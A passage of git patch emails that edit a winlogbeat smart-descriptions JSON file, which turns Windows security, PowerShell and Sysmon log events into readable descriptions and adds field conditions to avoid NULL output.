+    "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} successfully authenticated from {source.ip}",
+    "relationships": [
+      {
+        "source": "action.properties.TargetUserName",
+        "target": "source.ip",
+        "type": "authenticated from"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4768
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "action.outcome",
+        "value": "success"
+      }
+    ]
+  },
+  {
+    "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was denied a service ticket for {action.properties.ServiceName} from {source.ip} (Error Code: {action.properties.Status})",
+    "relationships": [
+      {
+        "source": "action.properties.TargetUserName",
+        "target": "action.properties.ServiceName",
+        "type": "was denied a ticket for"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4769
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was granted a service ticket for {action.properties.ServiceName} from {source.ip}",
+    "relationships": [
+      {
+        "source": "action.properties.TargetUserName",
+        "target": "action.properties.ServiceName",
+        "type": "was granted a ticket for"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4769
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "action.outcome",
+        "value": "success"
+      }
+    ]
+  },
+  {
+    "value": "{action.properties.TargetUserName} failed to authenticate from {source.ip}",
+    "relationships": [
+      {
+        "source": "action.properties.TargetUserName",
+        "target": "source.ip",
+        "type": "failed to authenticate from"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4771
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{action.properties.TargetUserName} failed to authenticate on {action.properties.Workstation} (Reason: {action.properties.Status})",
+    "relationships": [
+      {
+        "source": "action.properties.TargetUserName",
+        "target": "action.properties.Workstation",
+        "type": "failed to log on to"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4776
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "action.outcome",
+        "value": "failure"
+      }
+    ]
+  },
+  {
+    "value": "{action.properties.TargetUserName} successfully authenticated on {action.properties.Workstation}",
+    "relationships": [
+      {
+        "source": "action.properties.TargetUserName",
+        "target": "action.properties.Workstation",
+        "type": "logged on to"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4776
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "action.outcome",
+        "value": "success"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname} from {source.ip}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.SessionName",
+        "type": "reconnected on session"
+      },
+      {
+        "source": "user.name",
+        "target": "source.ip",
+        "type": "reconnected from"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4778
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "source.ip"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.SessionName",
+        "type": "reconnected on session"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4778
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} enumerated local groups of {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.TargetUserName",
+        "type": "enumerated local groups of"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4798
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} enumerated members of local group {action.properties.TargetUserName} on {log.hostname}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.TargetUserName",
+        "type": "enumerated members of"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4799
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "Authenticated user {user.name} was denied the access to Remote Desktop to {log.hostname} from IP {action.properties.ClientAddress}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "log.hostname",
+        "type": "wad denied RDP access to"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4825
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.TargetUserName",
+        "type": "assigned a new logon to special group"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4964
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} accessed network share {action.properties.ShareName} from IP {source.ip}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.ShareName",
+        "type": "accessed network share"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 5140
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} failed to access network share {action.properties.ShareName} from IP {source.ip}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.ShareName",
+        "type": "failed to access network share"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 5140
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "action.outcome",
+        "value": "failure"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} was granted access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.RelativeTargetName",
+        "type": "accessed shared file"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 5145
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} was denied access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.RelativeTargetName",
+        "type": "failed to access shared file"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 5145
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "action.outcome",
+        "value": "failure"
+      }
+    ]
+  },
+  {
+    "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}",
+    "relationships": [
+      {
+        "source": "action.properties.SourceAddress",
+        "target": "action.properties.DestAddress",
+        "type": "connected to"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 5156
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}",
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4103
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-PowerShell"
+      }
+    ]
+  },
+  {
+    "value": "{user.id} executed PowerShell code on {host.name}",
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4104
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-PowerShell"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}",
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4104
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-PowerShell"
+      }
+    ]
+  },
+  {
+    "value": "Started invocation of PowerShell ScriptBlock on {host.name}",
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4105
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-PowerShell"
+      }
+    ]
+  },
+  {
+    "value": "Completed invocation of PowerShell ScriptBlock on {host.name}",
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4106
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-PowerShell"
+      }
+    ]
+  },
+  {
+    "value": "Process {process.executable} created by {user.domain}\\{user.name} on {host.name}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "process.command_line",
+        "type": "executed"
+      },
+      {
+        "source": "process.command_line",
+        "target": "host.name",
+        "type": "executed on"
+      },
+      {
+        "source": "process.command_line",
+        "target": "process.executable",
+        "type": "uses executable"
+      },
+      {
+        "source": "process.parent.command_line",
+        "target": "process.parent.name",
+        "type": "uses executable"
+      },
+      {
+        "source": "process.parent.command_line",
+        "target": "host.name",
+        "type": "executed on"
+      },
+      {
+        "source": "process.parent.command_line",
+        "target": "process.command_line",
+        "type": "started"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 1
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Sysmon"
+      }
+    ]
+  },
+  {
+    "value": "Process {process.executable} changed the creation time of the file {file.name} on {host.name}",
+    "relationships": [
+      {
+        "source": "process.executable",
+        "target": "file.name",
+        "type": "changed creation time of"
+      },
+      {
+        "source": "process.executable",
+        "target": "host.name",
+        "type": "executed on"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 2
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Sysmon"
+      }
+    ]
+  },
+  {
+    "value": "Network connection from {source.ip} to {destination.ip}:{destination.port} by {process.executable} on {host.name}",
+    "relationships": [
+      {
+        "source": "source.ip",
+        "target": "destination.ip",
+        "type": "connected to"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 3
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Sysmon"
+      }
+    ]
+  },
+  {
+    "value": "{file.name} created by {process.executable} on {host.name}",
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 11
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Sysmon"
+      }
+    ]
+  },
+  {
+    "value": "Registry value {action.properties.TargetObject} created by {process.executable} on {log.hostname}",
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 12
+      },
+      {
+        "field": "action.properties.MessEventType",
+        "value": "CreateValue"
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Sysmon"
+      }
+    ]
+  },
+  {
+    "value": "Registry key {registry.key} set by {process.executable} on {host.name}",
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 13
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Sysmon"
+      }
+    ]
+  },
+  {
+    "value": "Sysmon configuration was updated on {host.name}",
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 16
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Sysmon"
+      }
+    ]
+  },
+  {
+    "value": "{host.name} performed a DNS query for name {dns.question.name} (status: {sysmon.dns.status})",
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 22
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Sysmon"
+      }
+    ]
+  },
   {
     "value": "Auditing event on {winlog.computer_name}: {event.action}",
     "conditions": [

From a68dec425ee56f45f66ae948e194e23595e86436 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 14 Nov 2024 17:44:03 +0100
Subject: [PATCH 232/317] Small fixes

---
 .../winlogbeat/_meta/smart-descriptions.json  | 51 -------------------
 1 file changed, 51 deletions(-)

diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json
index 5eaf6dc64..a3b786729 100644
--- a/Beats/winlogbeat/_meta/smart-descriptions.json
+++ b/Beats/winlogbeat/_meta/smart-descriptions.json
@@ -1134,12 +1134,6 @@
       {
         "field": "winlog.provider_guid",
         "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}"
-      },
-      {
-        "field": "winlog.computer_name"
-      },
-      {
-        "field": "event.action"
       }
     ]
   },
@@ -1149,15 +1143,6 @@
       {
         "field": "winlog.provider_guid",
         "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}"
-      },
-      {
-        "field": "winlog.computer_name"
-      },
-      {
-        "field": "winlog.SubjectUserSid"
-      },
-      {
-        "field": "event.action"
       }
     ]
   },
@@ -1171,15 +1156,6 @@
       {
         "field": "event.action",
         "value": "Filtering Platform Connection"
-      },
-      {
-        "field": "winlog.computer_name"
-      },
-      {
-        "field": "winlog.event_data.SourceAddress"
-      },
-      {
-        "field": "winlog.event_data.DestAddress"
       }
     ]
   },
@@ -1189,12 +1165,6 @@
       {
         "field": "winlog.provider_guid",
         "value": "{555908d1-a6d7-4695-8e1e-26931d2012f4}"
-      },
-      {
-        "field": "host.hostname"
-      },
-      {
-        "field": "event.original"
       }
     ]
   },
@@ -1204,12 +1174,6 @@
       {
         "field": "winlog.provider_guid",
         "value": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"
-      },
-      {
-        "field": "winlog.opcode"
-      },
-      {
-        "field": "winlog.computer_name"
       }
     ]
   },
@@ -1219,9 +1183,6 @@
       {
         "field": "winlog.provider_guid",
         "value": "{00000000-0000-0000-0000-000000000000}"
-      },
-      {
-        "field": "winlog.computer_name"
       }
     ]
   },
@@ -1231,12 +1192,6 @@
       {
         "field": "winlog.provider_guid",
         "value": "{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"
-      },
-      {
-        "field": "event.action"
-      },
-      {
-        "field": "winlog.computer_name"
       }
     ]
   },
@@ -1246,12 +1201,6 @@
       {
         "field": "event.module",
         "value": "powershell"
-      },
-      {
-        "field": "event.action"
-      },
-      {
-        "field": "winlog.computer_name"
       }
     ]
   },

From 60cfdc0bd0210d65b78ff4ef5cdbb8b25c7dcfc7 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 14 Nov 2024 17:58:27 +0100
Subject: [PATCH 233/317] Fixing details in smart description to avoid NULL

---
 .../winlogbeat/_meta/smart-descriptions.json  | 426 ++++++++++++++++++
 1 file changed, 426 insertions(+)

diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json
index a3b786729..ee074adf6 100644
--- a/Beats/winlogbeat/_meta/smart-descriptions.json
+++ b/Beats/winlogbeat/_meta/smart-descriptions.json
@@ -668,6 +668,158 @@
       }
     ]
   },
+  {
+    "value": "{user.name} reconnected on session {action.properties.SessionName} from {source.ip}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.SessionName",
+        "type": "reconnected on session"
+      },
+      {
+        "source": "user.name",
+        "target": "source.ip",
+        "type": "reconnected from"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4778
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "source.ip"
+      }
+    ]
+  },
+  {
+    "value": "{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.SessionName",
+        "type": "reconnected on session"
+      },
+      {
+        "source": "user.name",
+        "target": "source.ip",
+        "type": "reconnected from"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4778
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field":"host.hostname"
+      }
+    ]
+  },
+  {
+    "value": "{user.name} reconnected on session {action.properties.SessionName}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.SessionName",
+        "type": "reconnected on session"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4778
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} from {source.ip}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.SessionName",
+        "type": "reconnected on session"
+      },
+      {
+        "source": "user.name",
+        "target": "source.ip",
+        "type": "reconnected from"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4778
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "source.ip"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.SessionName",
+        "type": "reconnected on session"
+      },
+      {
+        "source": "user.name",
+        "target": "source.ip",
+        "type": "reconnected from"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4778
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field":"host.hostname"
+      }
+    ]
+  },
+  {
+    "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.SessionName",
+        "type": "reconnected on session"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4778
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
   {
     "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname} from {source.ip}",
     "relationships": [
@@ -693,6 +845,9 @@
       },
       {
         "field": "source.ip"
+      },
+      {
+        "field":"host.hostname"
       }
     ]
   },
@@ -776,6 +931,26 @@
       }
     ]
   },
+  {
+    "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "action.properties.TargetUserName",
+        "type": "assigned a new logon to special group"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4964
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Security-Auditing"
+      }
+    ]
+  },
   {
     "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}",
     "relationships": [
@@ -793,6 +968,9 @@
       {
         "field": "event.provider",
         "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "host.hostname"
       }
     ]
   },
@@ -969,6 +1147,191 @@
       }
     ]
   },
+  {
+    "value": "Process {process.executable} created by {user.name}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "process.command_line",
+        "type": "executed"
+      },
+      {
+        "source": "process.command_line",
+        "target": "process.executable",
+        "type": "uses executable"
+      },
+      {
+        "source": "process.parent.command_line",
+        "target": "process.parent.name",
+        "type": "uses executable"
+      },
+      {
+        "source": "process.parent.command_line",
+        "target": "process.command_line",
+        "type": "started"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 1
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Sysmon"
+      },
+      {
+        "field": "process.executable"
+      },
+      {
+        "field": "user.name"
+      }
+    ]
+  },
+  {
+    "value": "Process {process.executable} created by {user.domain}\\{user.name}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "process.command_line",
+        "type": "executed"
+      },
+      {
+        "source": "process.command_line",
+        "target": "process.executable",
+        "type": "uses executable"
+      },
+      {
+        "source": "process.parent.command_line",
+        "target": "process.parent.name",
+        "type": "uses executable"
+      },
+      {
+        "source": "process.parent.command_line",
+        "target": "process.command_line",
+        "type": "started"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 1
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Sysmon"
+      },
+      {
+        "field": "process.executable"
+      },
+      {
+        "field": "user.domain"
+      },
+      {
+        "field": "user.name"
+      }
+    ]
+  },
+  {
+    "value": "Process {process.executable} created by {user.name} on {host.name}",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "process.command_line",
+        "type": "executed"
+      },
+      {
+        "source": "process.command_line",
+        "target": "host.name",
+        "type": "executed on"
+      },
+      {
+        "source": "process.command_line",
+        "target": "process.executable",
+        "type": "uses executable"
+      },
+      {
+        "source": "process.parent.command_line",
+        "target": "process.parent.name",
+        "type": "uses executable"
+      },
+      {
+        "source": "process.parent.command_line",
+        "target": "host.name",
+        "type": "executed on"
+      },
+      {
+        "source": "process.parent.command_line",
+        "target": "process.command_line",
+        "type": "started"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 1
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Sysmon"
+      },
+      {
+        "field": "process.executable"
+      },
+      {
+        "field": "user.name"
+      },
+      {
+        "field": "host.name"
+      }
+    ]
+  },
+  {
+    "value": "Process {process.executable} created on {host.name}",
+    "relationships": [
+      {
+        "source": "process.command_line",
+        "target": "host.name",
+        "type": "executed on"
+      },
+      {
+        "source": "process.command_line",
+        "target": "process.executable",
+        "type": "uses executable"
+      },
+      {
+        "source": "process.parent.command_line",
+        "target": "process.parent.name",
+        "type": "uses executable"
+      },
+      {
+        "source": "process.parent.command_line",
+        "target": "host.name",
+        "type": "executed on"
+      },
+      {
+        "source": "process.parent.command_line",
+        "target": "process.command_line",
+        "type": "started"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 1
+      },
+      {
+        "field": "event.provider",
+        "value": "Microsoft-Windows-Sysmon"
+      },
+      {
+        "field": "process.executable"
+      },
+      {
+        "field": "host.name"
+      }
+    ]
+  },
   {
     "value": "Process {process.executable} created by {user.domain}\\{user.name} on {host.name}",
     "relationships": [
@@ -1011,6 +1374,18 @@
       {
         "field": "event.provider",
         "value": "Microsoft-Windows-Sysmon"
+      },
+      {
+        "field": "process.executable"
+      },
+      {
+        "field": "user.domain"
+      },
+      {
+        "field": "user.name"
+      },
+      {
+        "field": "host.name"
       }
     ]
   },
@@ -1148,6 +1523,57 @@
   },
   {
     "value": "Filtering connection on {winlog.computer_name} from {winlog.event_data.SourceAddress} to {winlog.event_data.DestAddress}",
+    "conditions": [
+      {
+        "field": "winlog.provider_guid",
+        "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}"
+      },
+      {
+        "field": "event.action",
+        "value": "Filtering Platform Connection"
+      },
+      {
+        "field": "winlog.event_data.SourceAddress"
+      },
+      {
+        "field": "winlog.event_data.DestAddress"
+      }
+    ]
+  },
+  {
+    "value": "Filtering connection on {winlog.computer_name} from {winlog.event_data.SourceAddress}",
+    "conditions": [
+      {
+        "field": "winlog.provider_guid",
+        "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}"
+      },
+      {
+        "field": "event.action",
+        "value": "Filtering Platform Connection"
+      },
+      {
+        "field": "winlog.event_data.SourceAddress"
+      }
+    ]
+  },
+  {
+    "value": "Filtering connection on {winlog.computer_name} to {winlog.event_data.DestAddress}",
+    "conditions": [
+      {
+        "field": "winlog.provider_guid",
+        "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}"
+      },
+      {
+        "field": "event.action",
+        "value": "Filtering Platform Connection"
+      },
+      {
+        "field": "winlog.event_data.DestAddress"
+      }
+    ]
+  },
+  {
+    "value": "Filtering connection on {winlog.computer_name}",
     "conditions": [
       {
         "field": "winlog.provider_guid",

From 1e1d1a72d4c376dd3741994d319e44d0a33c2795 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 14 Nov 2024 18:03:25 +0100
Subject: [PATCH 234/317] small fix

---
 Beats/winlogbeat/_meta/smart-descriptions.json | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json
index ee074adf6..b3a3257b7 100644
--- a/Beats/winlogbeat/_meta/smart-descriptions.json
+++ b/Beats/winlogbeat/_meta/smart-descriptions.json
@@ -16,6 +16,9 @@
       {
         "field": "event.provider",
         "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "action.properties.LogonType"
       }
     ]
   },
@@ -42,6 +45,9 @@
         "field": "event.provider",
         "value": "Microsoft-Windows-Security-Auditing"
       },
+      {
+        "field": "action.properties.LogonType"
+      },
       {
         "field": "source.ip"
       }

From 5a3e4861db9637ed8dcc5b49ebbcf8cfce42586b Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 14 Nov 2024 18:10:35 +0100
Subject: [PATCH 235/317] change from event.provider to winlog.provider_name

---
 .../winlogbeat/_meta/smart-descriptions.json  | 130 +++++++++---------
 1 file changed, 65 insertions(+), 65 deletions(-)

diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json
index b3a3257b7..b720b4ffb 100644
--- a/Beats/winlogbeat/_meta/smart-descriptions.json
+++ b/Beats/winlogbeat/_meta/smart-descriptions.json
@@ -14,7 +14,7 @@
         "value": 4624
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -42,7 +42,7 @@
         "value": 4624
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -68,7 +68,7 @@
         "value": 4625
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -88,7 +88,7 @@
         "value": 4625
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -113,7 +113,7 @@
         "value": 4625
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -136,7 +136,7 @@
         "value": 4634
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -156,7 +156,7 @@
         "value": 4648
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -176,7 +176,7 @@
         "value": 4648
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -200,7 +200,7 @@
         "value": 4662
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -220,7 +220,7 @@
         "value": 4672
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -240,7 +240,7 @@
         "value": 4672
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -285,7 +285,7 @@
         "value": 4688
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -305,7 +305,7 @@
         "value": 4689
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -325,7 +325,7 @@
         "value": 4720
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -345,7 +345,7 @@
         "value": 4722
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -365,7 +365,7 @@
         "value": 4723
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -389,7 +389,7 @@
         "value": 4723
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
@@ -413,7 +413,7 @@
         "value": 4725
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -433,7 +433,7 @@
         "value": 4726
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -453,7 +453,7 @@
         "value": 4727
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -473,7 +473,7 @@
         "value": 4742
       },
       {
-        "field": "event.provider",
+        "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
       }
     ]
@@ -493,7 +493,7 @@
         "value": 4744
       },
       {
